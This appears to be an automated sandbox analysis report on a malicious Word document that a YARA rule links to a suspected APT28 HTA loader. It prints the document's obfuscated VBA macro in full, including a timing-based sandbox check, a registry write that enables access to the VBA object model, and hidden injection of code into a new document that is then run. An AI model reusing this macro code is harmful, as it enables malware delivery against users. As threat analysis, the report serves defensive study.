                        2025-01-13 20:35:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 66 67 44 59 7a 7a 77 71 30 79 4a 57 4f 6a 65 48 64 61 56 52 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: UfgDYzzwq0yJWOjeHdaVRg.0Payload parsing failed.


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:15:33:20
                        Start date:13/01/2025
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x7ff642750000
                        File size:1'637'952 bytes
                        MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:7
                        Start time:15:33:45
                        Start date:13/01/2025
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x7ff642750000
                        File size:1'637'952 bytes
                        MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:9
                        Start time:15:33:48
                        Start date:13/01/2025
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale
                        Imagebase:0x7ff6c29d0000
                        File size:32'768 bytes
                        MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, Author: Sekoia.io
                        Reputation:moderate
                        Has exited:false

                        Disassembly

                        Code Analysis

                        Call Graph

                        Module: ThisDocument

                        Declaration
                        LineContent
                        1

                        Attribute VB_Name = "ThisDocument"

                        2

                        Attribute VB_Base = "1Normal.ThisDocument"

                        3

                        Attribute VB_GlobalNameSpace = False

                        4

                        Attribute VB_Creatable = False

                        5

                        Attribute VB_PredeclaredId = True

                        6

                        Attribute VB_Exposed = True

                        7

                        Attribute VB_TemplateDerived = True

                        8

                        Attribute VB_Customizable = True

                        9

                        Public objApp, wsl

                        Executed Functions

                        Subroutine

                        documeNt_opEnAPIs: 37, Strings: 6, Number of lines: 29, Relevance: 94.029

                        APIsMeta Information

                        Unprotect

                        Shapes

                        ActiveDocument

                        Panes

                        Delete

                        Save

                        Now

                        Now

                        TimeValue

                        DoEvents

                        Now

                        TimeValue

                        Part of subcall function verydanger@ThisDocument: CreateObject

                        Part of subcall function verydanger@ThisDocument: RegWrite

                        Part of subcall function verydanger@ThisDocument: Version

                        Part of subcall function verydanger@ThisDocument: Application

                        CreateObject

                        		CreateObject("Word.Application") -> Microsoft Word

                        Visible

                        Documents

                        Variables

                        ActiveDocument

                        Add

                        Name

                        AddFromString

                        vbCrLf

                        Part of subcall function danger@ThisDocument: Item

                        ExpandEnvironmentStrings

                        		IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp

                        SaveAs2

                        Name

                        ActiveDocument

                        Close

                        Part of subcall function rundoc@ThisDocument: Open

                        Part of subcall function rundoc@ThisDocument: Save

                        Part of subcall function rundoc@ThisDocument: Close

                        Name

                        ActiveDocument

                        Quit

                        StringsDecrypted Strings
                        "oikmseM#*inmowefj8349an3"
                        "00:00:15"
                        "Word.Application"
                        "Sub goods() : : End Sub"
                        "ThisDocument"
                        "%localapp""data%\T""emp"
                        LineInstructionMeta Information
                        24

                        Sub documeNt_opEn()

                        25

                        On Error Resume Next

                        executed
                        26

                        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")

                        Unprotect

                        27

                        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1

                        Shapes

                        ActiveDocument

                        Panes

                        28

                        ActiveDocument.Shapes(i).Delete

                        Delete

                        29

                        Next i

                        Shapes

                        ActiveDocument

                        Panes

                        30

                        ActiveDocument.Save

                        Save

                        31

                        sss = Now()

                        Now

                        32

                        While Now < sss + TimeValue("00:00:20")

                        Now

                        TimeValue

                        33

                        DoEvents

                        DoEvents

                        34

                        Wend

                        Now

                        TimeValue

                        35

                        If Now() - sss < TimeValue("00:00:15") Then

                        Now

                        TimeValue

                        35

                        Exit Sub

                        35

                        Endif

                        36

                        verydanger

                        37

                        Set objApp = CreateObject("Word.Application")

                        CreateObject("Word.Application") -> Microsoft Word

                        executed
                        38

                        objApp.Visible = False

                        Visible

                        39

                        Set doc = objApp.Documents.Add

                        Documents

                        40

                        For Each vars in ActiveDocument.Variables

                        Variables

                        ActiveDocument

                        41

                        doc.Variables.Add vars.Name & "ergegdr", vars

                        Add

                        Name

                        42

                        i = i + 1

                        43

                        Next

                        Variables

                        ActiveDocument

                        44

                        doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()

                        AddFromString

                        vbCrLf

                        45

                        tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")

                        IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp

                        executed
                        46

                        doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13

                        SaveAs2

                        Name

                        ActiveDocument

                        47

                        doc.Close

                        Close

                        48

                        rundoc (tmp & "\" & ActiveDocument.Name & ".doc")

                        Name

                        ActiveDocument

                        49

                        objApp.Quit False

                        Quit

                        50

                        End Sub

                        Function

                        rundocAPIs: 3, Strings: 0, Number of lines: 5, Relevance: 10.505

                        APIsMeta Information

                        Open

                        		Documents.Open("C:\Users\Ganji\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc")

                        Save

                        Close

                        LineInstructionMeta Information
                        13

                        Function rundoc(namedoc)

                        14

                        Set doc2 = objApp.Documents.Open(namedoc)

                        Documents.Open("C:\Users\Ganji\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc")

                        executed
                        15

                        doc2.Save

                        Save

                        16

                        doc2.Close

                        Close

                        17

                        End Function

                        Subroutine

                        verydangerAPIs: 4, Strings: 3, Number of lines: 6, Relevance: 14.006

                        APIsMeta Information

                        CreateObject

                        		CreateObject("WScript.Shell")

                        RegWrite

                        Version

                        Application

                        StringsDecrypted Strings
                        "WSc""ript.She"
                        "HK""CU\Softw""are\Micr""osoft\Of""fice\"
                        "REG_D""WORD"
                        LineInstructionMeta Information
                        18

                        Sub verydanger()

                        19

                        strng = "WSc" & "ript.She"

                        executed
                        20

                        strng = strng & "ll"

                        21

                        Set wsl = CreateObject(strng)

                        CreateObject("WScript.Shell")

                        executed
                        22

                        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"

                        RegWrite

                        Version

                        Application

                        23

                        End Sub

                        Function

                        dangerAPIs: 1, Strings: 1, Number of lines: 3, Relevance: 3.003

                        APIsMeta Information

                        Item

                        StringsDecrypted Strings
                        "s2"
                        LineInstructionMeta Information
                        10

                        Function danger()

                        11

                        danger = ActiveDocument.Variables.Item("s2")

                        Item

                        executed
                        12

                        End Function

                        Reset < >